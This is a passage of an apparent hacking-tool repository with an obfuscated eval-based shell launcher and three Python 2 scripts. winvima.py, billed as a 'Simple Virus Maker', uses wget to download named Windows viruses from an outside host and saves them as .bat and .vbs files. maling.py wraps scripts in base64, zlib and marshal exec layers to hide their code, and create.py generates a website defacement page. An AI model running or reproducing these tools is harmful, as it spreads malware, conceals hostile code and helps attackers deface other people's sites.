$G';yCz=' Val';FGz='//ww';KDz='date';TBz='are ';Lz='1;93';RBz='"║$Y';CDz='G ';WCz=' $M';wDz='═══╝';XBz='ble$';UBz='NOT ';OBz=' ARM';xBz='$W ';GGz='w.gi';cDz='0R O';fEz='$W ║';gz='════';rEz='.$G ';MBz='LIA ';RDz=' ins';MDz=' Hop';DGz='all.';BGz='ll';fCz=' ║';wBz='║"';Qz='W='\''\';uFz='ux_h';dDz='ccur';YDz='ad ';lEz='$W"╚';bFz='run.';xEz='r Te';Bz='r';FDz=' New';VEz='║$C ';fDz='B Us';OFz='if [';AEz='$G"║';CBz='"║$G';lz='W ┃';eBz='is$C';pEz='all ';qCz='Are ';UDz='uir.';PFz=' $pi';ZCz='Y Us';UCz='ol L';lFz='xdg-';NEz='$G"╚';JDz='B Up';iDz='Runn';oBz='"║$C';cz='━━━━';CCz='hor ';Tz='0m'\''';Dz='x1b[';iFz='OWSE';wCz='Y Lo';vEz='ollo';Pz='1;95';uBz='020$';fz='"╔══';lBz='Y"';cCz=' Pas';VCz='ogin';sEz='╝"';nFz=' "ht';KGz='0r-I';AGz='nsta';DDz='$W F';wFz='ng"';vBz='M ';qEz='Reqr';CFz='p 0.';gFz=' YOU';LCz='$B"╔';hEz='Down';mz='"║$R';oFz='tps:';Zz='echo';jDz='ing ';bz='$W"╭';GEz=' $G ';iz='$W"┃';gCz='$W P';RFz=''\''1'\'' ';PBz='Y$C ';GDz=' One';fFz='OPEN';VFz='ool';Vz='='\''\E';yBz=' ○$W';aBz='Any ';Xz='enda';pBz=' Cre';KCz='5';sDz=' $G║';ABz='$R██';WEz='Logi';ECz=' ERR';KBz='"║$B';nEz='$C 3';jz='$W ●';Cz='R='\''\';Iz='B='\''\';sFz='com/';iEz='load';ZDz=' $G';mBz='$G██';JFz='read';YBz='"║$M';KEz=' INS';xFz=''\''3'\'' ';CGz='inst';Yz='='\'''\''';Fz='m'\''';UEz='$G ║';DCz=': $M';Jz='1;94';oEz='Inst';bBz='Misu';WBz='onsi';BDz='r $';wEz='w Ou';FFz='Y Ch';iCz='e Do';Kz='Y='\''\';kFz='p 3';uCz='d, F';tz='C ║"';Rz='1;97';VBz='Resp';pFz='//in';hFz='R BR';BEz='$B ';qDz='Than';Az='clea';rz='Hack';bDz='o No';lDz='New ';XDz='n Do';qFz='stag';IDz='ng ';QEz='"$G"';nCz='B Ol';XEz='n To';BBz='█$W┃';ZBz=' Of ';QDz='$R F';uEz=' F';ez='"$C ';uz='$G "';aFz='on2 ';QBz=' ';UFz='cd t';jCz='wnlo';ACz=' ┃';LDz='d.$G';xDz='$G"╔';NCz=' "╔═'; 3 | eval "$Az$Bz$z$Cz$Dz$Ez$Fz$z$Gz$Dz$Hz$Fz$z$Iz$Dz$Jz$Fz$z$Kz$Dz$Lz$Fz$z$Mz$Dz$Nz$Fz$z$Oz$Dz$Pz$Fz$z$Qz$Dz$Rz$Fz$z$Sz$Dz$Tz$z$Uz$Vz$Wz$z$Xz$Yz$z$Zz$z$Zz$az$bz$cz$dz$ez$fz$gz$gz$gz$gz$gz$hz$z$Zz$az$iz$jz$kz$lz$ez$mz$nz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$vz$yz$z$Zz$az$iz$ABz$vz$BBz$ez$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$uz$vz$wz$xz$vz$yz$z$Zz$az$iz$ABz$vz$BBz$ez$KBz$LBz$MBz$NBz$OBz$PBz$QBz$JBz$uz$vz$wz$xz$vz$yz$z$Zz$az$iz$ABz$vz$BBz$ez$RBz$SBz$TBz$UBz$VBz$WBz$XBz$tz$uz$vz$wz$xz$vz$yz$z$Zz$az$iz$wz$vz$BBz$ez$YBz$ZBz$aBz$bBz$cBz$dBz$eBz$JBz$z$Zz$az$iz$wz$vz$BBz$ez$fBz$gz$gz$gz$gz$gz$gBz$uz$hBz$iBz$jBz$kBz$OBz$lBz$z$Zz$az$iz$mBz$vz$BBz$yz$z$Zz$az$iz$mBz$vz$BBz$nBz$fz$gz$gz$gz$gz$gz$hz$z$Zz$az$iz$mBz$vz$BBz$nBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$wBz$z$Zz$az$iz$xBz$yBz$ACz$nBz$CBz$BCz$CCz$DCz$ECz$FCz$vBz$QBz$wBz$z$Zz$az$GCz$cz$HCz$nBz$fBz$gz$gz$gz$gz$gz$gBz$z$Zz$z$ICz$JCz$KCz$z$Zz$az$LCz$gz$gz$gz$gz$gz$gz$MCz$NCz$gz$gz$gz$gz$gz$OCz$yz$z$Zz$az$PCz$QCz$RCz$SCz$TCz$UCz$VCz$WCz$XCz$YCz$ZCz$aCz$bCz$cCz$dCz$eCz$fCz$yz$z$Zz$az$PCz$gCz$hCz$iCz$jCz$kCz$lCz$mCz$XCz$YCz$nCz$oCz$pCz$qCz$rCz$sCz$fCz$yz$z$Zz$az$PCz$tCz$cCz$dCz$uCz$vCz$WCz$QBz$XCz$YCz$wCz$xCz$yCz$ADz$BDz$CDz$fCz$yz$z$Zz$az$PCz$DDz$EDz$FDz$GDz$HDz$IDz$mCz$XCz$YCz$JDz$KDz$LDz$MDz$NDz$ODz$sCz$PDz$z$Zz$az$PCz$QDz$vCz$RDz$SDz$TDz$UDz$WCz$XCz$YCz$VDz$WDz$XDz$jCz$YDz$ZDz$fCz$yz$z$Zz$az$PCz$aDz$bDz$ECz$cDz$dDz$eDz$mCz$XCz$YCz$fDz$aCz$bCz$cCz$dCz$eCz$fCz$yz$z$Zz$az$PCz$gDz$hDz$iDz$jDz$kDz$lDz$mCz$XCz$YCz$mDz$nDz$oDz$pDz$qDz$rDz$sDz$yz$z$Zz$az$tDz$gz$gz$gz$gz$gz$gz$uDz$vDz$gz$gz$gz$gz$gz$wDz$yz$z$ICz$JCz$KCz$z$Zz$az$xDz$gz$gz$gz$gz$gz$yDz$z$Zz$az$AEz$BEz$CEz$DEz$EEz$FEz$GEz$PDz$z$Zz$az$AEz$HEz$IEz$JEz$KEz$LEz$MEz$PDz$z$Zz$az$NEz$gz$gz$gz$gz$gz$OEz$z$Zz$z$ICz$PEz$z$Zz$az$xDz$OCz$QEz$REz$gz$gz$hz$z$Zz$az$SEz$TEz$UEz$QEz$VEz$WEz$XEz$YEz$ZEz$z$Zz$az$NEz$wDz$QEz$aEz$gz$gz$gBz$z$Zz$az$bEz$OCz$cEz$REz$gz$gz$gz$gz$OCz$yz$z$Zz$az$dEz$eEz$fEz$cEz$gEz$hEz$iEz$DBz$jEz$kEz$fEz$yz$z$Zz$az$lEz$wDz$cEz$aEz$gz$gz$gz$gz$wDz$yz$z$Zz$az$xDz$OCz$QEz$REz$gz$gz$gz$mEz$z$Zz$az$AEz$nEz$UEz$QEz$VEz$oEz$pEz$qEz$rEz$wBz$z$Zz$az$NEz$wDz$QEz$aEz$gz$gz$gz$sEz$z$Zz$az$bEz$OCz$cEz$REz$gz$gz$gz$gz$gz$yDz$z$Zz$az$dEz$tEz$fEz$cEz$gEz$uEz$vEz$wEz$xEz$yEz$AFz$PDz$z$Zz$az$lEz$wDz$cEz$aEz$gz$gz$gz$gz$gz$OEz$z$Zz$BFz$z$ICz$CFz$DFz$z$Zz$az$xDz$EFz$FFz$GFz$HFz$IFz$z$JFz$KFz$fBz$gz$gz$gz$LFz$MFz$NFz$z$OFz$PFz$QFz$RFz$SFz$z$TFz$z$UFz$VFz$z$WFz$XFz$YFz$z$ZFz$aFz$bFz$cFz$z$dFz$z$OFz$PFz$QFz$eFz$SFz$z$TFz$z$Zz$az$uz$fFz$gFz$hFz$iFz$jFz$z$ICz$kFz$z$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$z$dFz$z$OFz$PFz$QFz$xFz$SFz$z$TFz$z$yFz$AGz$BGz$z$ZFz$aFz$CGz$DGz$cFz$z$dFz$z$OFz$PFz$QFz$EGz$SFz$z$TFz$z$lFz$mFz$nFz$oFz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$z$dFz" -------------------------------------------------------------------------------- /tool/winvima.py: -------------------------------------------------------------------------------- 1 | import os, sys 2 | R = '\x1b[1;31m' 3 | N = '\x1b[0m' 4 | Y = '\x1b[1;33m' 5 | G = '\x1b[1;37m' 6 | print '%s+---------------------------------------------------+%s' % (R, N) 7 | print '%s||[#]%s--------------%s[ VBug Maker ]%s---------------%s[#]||%s' % (Y, R, Y, R, Y, N) 8 | print '%s||%s |___________%s[ Simple Virus Maker ]%s____________|%s ||%s' % (Y, R, Y, R, Y, N) 9 | print '%s||%s |____________%s[ Winvima--Session ]%s_____________|%s ||%s' % (Y, R, Y, R, Y, N) 10 | print '%s+---------------------------------------------------+%s' % (R, N) 11 | print 12 | type_of_virus = raw_input(' %s[%s*%s] %s(%sR%s)%s.I.P %s| %s(%sK%s)%soce %s| %s(%sRE%s)%sg-Eater %s| %s(%sC%s)%sMD %s| %s(%s4%s)%s04 %s| %s(%sA%s)%slay %s| %s(%sCA%s)%spslock %s| %s(%sJ%s)%selek %s| %s(%sKU%s)%sIS %s| %s(%sS%s)%sleepy %s:%s ' % (Y, R, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, R, Y)) 13 | if type_of_virus == 'R' or type_of_virus == 'r': 14 | print '\n %s[%s+%s]%s Download the virus%s...%s' % (Y, R, Y, G, R, N) 15 | os.system('wget -q http://override.waper.co/files/rip.apk') 16 | os.system('mkdir virus/RIP;mv rip.apk virus/RIP/RIP.bat') 17 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 18 | sys.exit() 19 | else: 20 | if type_of_virus == 'K' or type_of_virus == 'k': 21 | print '\n %s[%s+%s]%s Download the virus...%s Done%s' % (Y, R, Y, G, R, N) 22 | os.system('wget -q http://override.waper.co/files/koce.apk') 23 | os.system('mkdir virus/koce;mv koce.apk virus/koce/koce.bat') 24 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 25 | sys.exit() 26 | else: 27 | if type_of_virus == 'RE' or type_of_virus == 're': 28 | print '\n %s[%s+%s]%s Download the virus...%s Done%s' % (Y, R, Y, G, R, N) 29 | os.system('wget -q http://override.waper.co/files/regeater.apk') 30 | os.system('mkdir virus/reg-eater;mv regeater.apk virus/reg-eater/reg-eater.bat') 31 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 32 | sys.exit() 33 | else: 34 | if type_of_virus == 'C' or type_of_virus == 'c': 35 | print '\n %s[%s+%s]%s Download the virus...%s Done%s' % (Y, R, Y, G, R, N) 36 | os.system('wget -q http://override.waper.co/files/cmd.apk') 37 | os.system('mkdir virus/CMD;mv cmd.apk virus/CMD/cmd.bat') 38 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 39 | sys.exit() 40 | else: 41 | if type_of_virus == '4' or type_of_virus == '04': 42 | print '\n %s[%s+%s]%s Download the virus...%s Done%s' % (Y, R, Y, G, R, N) 43 | os.system('wget -q http://override.waper.co/files/404.apk') 44 | os.system('wget -q http://override.waper.co/files/404.zip') 45 | os.system('mkdir virus/404;mv 404.apk virus/404/404.bat;mv 404.zip virus/404/README.txt') 46 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 47 | sys.exit() 48 | else: 49 | if type_of_virus == 'A' or type_of_virus == 'a': 50 | print '\n %s[%s+%s]%s Download the virus...%s Done%s' % (Y, R, Y, G, R, N) 51 | os.system('wget -q http://override.waper.co/files/alay.apk') 52 | os.system('wget -q http://override.waper.co/files/alay.zip') 53 | os.system('mkdir virus/aLAy;mv alay.apk virus/aLAy/alay.vbs;mv alay.zip virus/aLAy/README.txt') 54 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 55 | sys.exit() 56 | else: 57 | if type_of_virus == 'CA' or type_of_virus == 'ca' or type_of_virus == 'Ca': 58 | print '\n %s[%s+%s]%s Download the virus...%s Done%s' % (Y, R, Y, G, R, N) 59 | os.system('wget -q http://override.waper.co/files/capslock.apk') 60 | os.system('wget -q http://override.waper.co/files/capslock.zip') 61 | os.system('mkdir virus/CapsLock;mv capslock.apk virus/CapsLock/capslock.vbs;mv capslock.zip virus/CapsLock/README.txt') 62 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 63 | sys.exit() 64 | else: 65 | if type_of_virus == 'J' or type_of_virus == 'j': 66 | print '\n %s[%s+%s]%s Download the virus...%s Done%s' % (Y, R, Y, G, R, N) 67 | os.system('wget -q http://override.waper.co/files/jelek.apk') 68 | os.system('wget -q http://override.waper.co/files/jelek.zip') 69 | os.system('mkdir virus/jelek;mv jelek.apk virus/jelek/jelek.vbs;mv jelek.zip virus/jelek/README.txt') 70 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 71 | sys.exit() 72 | else: 73 | if type_of_virus == 'KU' or type_of_virus == 'ku' or type_of_virus == 'Ku': 74 | print '\n %s[%s+%s]%s Download the virus...%s Done%s' % (Y, R, Y, G, R, N) 75 | os.system('wget -q http://override.waper.co/files/kuis.apk') 76 | os.system('wget -q http://override.waper.co/files/kuis.zip') 77 | os.system('mkdir virus/KUIS;mv kuis.apk virus/KUIS/kuis.bat;mv kuis.zip virus/KUIS/README.txt') 78 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 79 | sys.exit() 80 | else: 81 | if type_of_virus == 'S' or type_of_virus == 's': 82 | print '\n %s[%s+%s]%s Download the virus...%s Done%s' % (Y, R, Y, G, R, N) 83 | os.system('wget -q http://override.waper.co/files/sleepy.apk') 84 | os.system('wget -q http://override.waper.co/files/sleepy.zip') 85 | os.system('mkdir virus/sleepy;mv sleepy.apk virus/sleepy/sleepy.bat;mv sleepy.zip virus/sleepy/README.txt') 86 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 87 | sys.exit() 88 | else: 89 | print '%s[%s%s]%s ERROR%s:%s Wrong Input...%s' % (Y, R, Y, R, Y, G, N) 90 | time.sleep(2) 91 | print '%s[%s!%s]%s ERROR%s:%s Exit the Program...%s' % (Y, R, Y, R, Y, G, N) 92 | sys.exit() 93 | -------------------------------------------------------------------------------- /tool/maling.py: -------------------------------------------------------------------------------- 1 | import base64, zlib, marshal, sys 2 | W = '\x1b[1;97m' 3 | RR = '\x1b[1;97m\x1b[91m' 4 | O = '\x1b[93m' 5 | B = '\x1b[94m' 6 | print ("{}{}\n______ _ \n| ___ \\ | | \n| |_/ / _ _ ___ _ __ _ _ _ __ | |_ ___ _ __ \n| __/ | | | | / __|| '__|| | | || '_ \\ | __| / _ \\ | '__|\n| | | |_| || (__ | | | |_| || |_) || |_ | (_) || | \n\\_| \\__, | \\___||_| \\__, || .__/ \\__| \\___/ |_| \n __/ | __/ || | \n |___/ |___/ |_| - {}Coded By ERR0R\n \n{}[++ {}Menu:\n\t\n {}[{}01{}]{} Encrypt File With base64\n {}[{}02{}]{} Encrypt File With base16\n {}[{}03{}]{} Encrypt File With base32\n {}[{}04{}]{} Encrypt File With marshal\n {}[{}05{}]{} Encrypt File With zlib&base64\n {}[{}06{}]{} Encrypt File With zlib&base64&marshal\n {}[{}07{}]{} Encrypt File With zlib&base16&marshal\n {}[{}08{}]{} Encrypt File With zlib&base32&marshal\n {}[{}09{}]{} EXIT\n {}[{}10{}]{} info\n").format(W, O, W, RR, W, B, RR, B, W, B, RR, B, W, B, RR, B, W, B, RR, B, W, B, RR, B, W, B, RR, B, W, B, RR, B, W, B, RR, B, W, B, RR, B, W, B, RR, B, W) 7 | 8 | def main(): 9 | choice = raw_input(RR + '[++ ' + W + 'Choose: ') 10 | if choice == '1' or choice == '01': 11 | try: 12 | file = raw_input(RR + '[+] ' + W + 'File: ') 13 | fileopen = open(file).read() 14 | a = base64.b64encode(fileopen) 15 | b = "import base64\nexec(base64.b64decode('" + a + "'))" 16 | c = file.replace('.py', '_endcrypt.py') 17 | d = open(c, 'w') 18 | d.write(b) 19 | d.close() 20 | print RR + '[*] ' + W + 'OUTPUT:', c 21 | main() 22 | except: 23 | print RR + '[-] ' + W + 'File NOT Found!' 24 | main() 25 | 26 | if choice == '2' or choice == '02': 27 | try: 28 | file = raw_input(RR + '[+] ' + W + 'File: ') 29 | fileopen = open(file).read() 30 | a = base64.b16encode(fileopen) 31 | b = "import base64\nexec(base64.b16decode('" + a + "'))" 32 | c = file.replace('.py', '_endcrypt.py') 33 | d = open(c, 'w') 34 | d.write(b) 35 | d.close() 36 | print RR + '[*] ' + W + 'OUTPUT:', c 37 | main() 38 | except: 39 | print RR + '[-] ' + W + 'File NOT Found!' 40 | main() 41 | 42 | if choice == '3' or choice == '03': 43 | try: 44 | file = raw_input(RR + '[+] ' + W + 'File: ') 45 | fileopen = open(file).read() 46 | a = base64.b32encode(fileopen) 47 | b = "import base64\nexec(base64.b32decode('" + a + "'))" 48 | c = file.replace('.py', '_endcrypt.py') 49 | d = open(c, 'w') 50 | d.write(b) 51 | d.close() 52 | print RR + '[*] ' + W + 'OUTPUT:', c 53 | main() 54 | except: 55 | print RR + '[-] ' + W + 'File NOT Found!' 56 | main() 57 | 58 | if choice == '4' or choice == '04': 59 | try: 60 | file = raw_input(RR + '[+] ' + W + 'File: ') 61 | fileopen = open(file).read() 62 | a = compile(fileopen, 'dg', 'exec') 63 | m = marshal.dumps(a) 64 | s = repr(m) 65 | b = 'import marshal\nexec(marshal.loads(' + s + '))' 66 | c = file.replace('.py', '_endcrypt.py') 67 | d = open(c, 'w') 68 | d.write(b) 69 | d.close() 70 | print RR + '[*] ' + W + 'OUTPUT:', c 71 | main() 72 | except: 73 | print RR + '[-] ' + W + 'File NOT Found!' 74 | main() 75 | 76 | if choice == '5' or choice == '05': 77 | try: 78 | file = raw_input(RR + '[+] ' + W + 'File: ') 79 | fileopen = open(file).read() 80 | c = zlib.compress(fileopen) 81 | d = base64.b64encode(c) 82 | e = 'import marshal,zlib,base64\nexec(zlib.decompress(base64.b64decode("' + d + '")))' 83 | f = file.replace('.py', '_endcrypt.py') 84 | g = open(f, 'w') 85 | g.write(e) 86 | g.close() 87 | print RR + '[*] ' + W + 'OUTPUT:', f 88 | main() 89 | except: 90 | print RR + '[-] ' + W + 'File NOT Found!' 91 | main() 92 | 93 | if choice == '6' or choice == '06': 94 | try: 95 | file = raw_input(RR + '[+] ' + W + 'File: ') 96 | fileopen = open(file).read() 97 | sa = compile(fileopen, 'dg', 'exec') 98 | sb = marshal.dumps(sa) 99 | c = zlib.compress(sb) 100 | d = base64.b64encode(c) 101 | e = 'import marshal,zlib,base64\nexec(marshal.loads(zlib.decompress(base64.b64decode("' + str(d) + '"))))' 102 | f = file.replace('.py', '_endcrypt.py') 103 | g = open(f, 'w') 104 | g.write(e) 105 | g.close() 106 | print RR + '[*] ' + W + 'OUTPUT:', f 107 | main() 108 | except: 109 | print RR + '[-] ' + W + 'File NOT Found!' 110 | main() 111 | 112 | if choice == '7' or choice == '07': 113 | try: 114 | file = raw_input(RR + '[+] ' + W + 'File: ') 115 | fileopen = open(file).read() 116 | sa = compile(fileopen, 'dg', 'exec') 117 | sb = marshal.dumps(sa) 118 | c = zlib.compress(sb) 119 | d = base64.b16encode(c) 120 | e = 'import marshal,zlib,base64\nexec(marshal.loads(zlib.decompress(base64.b16decode("' + str(d) + '"))))' 121 | f = file.replace('.py', '_endcrypt.py') 122 | g = open(f, 'w') 123 | g.write(e) 124 | g.close() 125 | print RR + '[*] ' + W + 'OUTPUT:', f 126 | main() 127 | except: 128 | print RR + '[-] ' + W + 'File NOT Found!' 129 | main() 130 | 131 | if choice == '8' or choice == '08': 132 | try: 133 | file = raw_input(RR + '[+] ' + W + 'File: ') 134 | fileopen = open(file).read() 135 | sa = compile(fileopen, 'dg', 'exec') 136 | sb = marshal.dumps(sa) 137 | c = zlib.compress(sb) 138 | d = base64.b32encode(c) 139 | e = 'import marshal,zlib,base64\nexec(marshal.loads(zlib.decompress(base64.b32decode("' + str(d) + '"))))' 140 | f = file.replace('.py', '_endcrypt.py') 141 | g = open(f, 'w') 142 | g.write(e) 143 | g.close() 144 | print RR + '[*] ' + W + 'OUTPUT:', f 145 | main() 146 | except: 147 | print RR + '[-] ' + W + 'File NOT Found!' 148 | main() 149 | 150 | if choice == '9' or choice == '09': 151 | sys.exit(RR + '[*] ' + W + 'SEE YA NEXT TIME!1!1') 152 | else: 153 | if choice == '10': 154 | print '\n\tAUTHOR\n\t===================================\n\tCREATED BY : ITALIA CYBER ARMY\n\tCODED BY : ERR0R\n\tTELEGRAM : https://t.me/termuxxhacking\n\tGITHUB : https://github.com/Err0r-ICA\n\t\t \n\tREPORT BUG ON FACEBOOK OR INSTAGRAM\n\t===================================\n\tfb : ERR0R\n\tig : R00t_\n\t===================================\n\t' 155 | main() 156 | else: 157 | print RR + '[-] ' + W + 'WRONG INPUT!!' 158 | sys.exit(RR + '[*] ' + W + 'SEE YA NEXT TIME!1!1') 159 | 160 | 161 | if __name__ == '__main__': 162 | main() 163 | -------------------------------------------------------------------------------- /tool/create.py: -------------------------------------------------------------------------------- 1 | logo = ' _ ___ _____ _ __\n / | / (_)_______ / ___/__________(_)___ / /_\n / |/ / / ___/ _ \\__ \\/ ___/ ___/ / __ \\/ __/\n / /| / / /__/ __/__/ / /__/ / / / /_/ / /_\n/_/ |_/_/\\___/\\___/____/\\___/_/ /_/ .___/\\__/\n /_/\n[==========================]\n[=====Author : *ERR0R*=====] ANTI RECODE\n[=====Team : LCI =====] JANGAN RECODE\n[=====Ver : 1.0 =====] YA BOSQUEE..\n[==========================]' 2 | print logo 3 | print 4 | print '[===Make Your Deface Script===]' 5 | title = raw_input('[=Title=> ') 6 | alert = raw_input('[=Alert=> ') 7 | head = raw_input('[=Header=> ') 8 | picture = raw_input('[=Link Picture=> ') 9 | music = raw_input('[=Link Music=> ') 10 | mess1 = raw_input('[=Enter Message (Use
For New Lines) => ') 11 | mess2 = raw_input('[=Enter Moving Writing => ') 12 | team = raw_input('[=Team=> ') 13 | logoteam = raw_input('[=Logo Team=> ') 14 | thanksto = raw_input('[=Thanks to=> ') 15 | fo = open('depes.html', 'w') 16 | script1 = '[+]' 17 | script2 = title 18 | script3 = '[+]\n\t\n\t\n\t\n \n\n\n\n\n
\n\n
\n

\n\n\n \n

\n\n\n\n\n\n\n
\n\n

\n
' 27 | script12 = mess1 28 | script13 = '

\n\n \n ' 29 | script14 = mess2 30 | script15 = '\n
\n \n

\n\n\t___________________________________________________________

\n\n\n [+]' 31 | script16 = team 32 | script17 = '[+]

\n\n\t___________________________________________________________\n

\n


\n\n
\n\n
\n\n
\n\n\n\nGreetz : \n\n\n\n\n\n\n\n\n\n\n\n' 35 | script20 = thanksto 36 | script21 = '
\n
\n\n